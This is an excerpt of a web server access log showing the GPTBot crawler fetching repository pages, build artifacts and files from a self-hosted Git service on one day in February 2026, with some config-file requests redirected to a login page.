[Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21683] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21645] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21680] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21683] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11097] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14632] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14659] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14658] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14658] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14710] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=all" [Client 74.7.227.38] [Length 8472] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:16:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11857] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11855] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11854] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11816] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:55:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:55:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:55:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:55:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23808] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23799] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23830] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 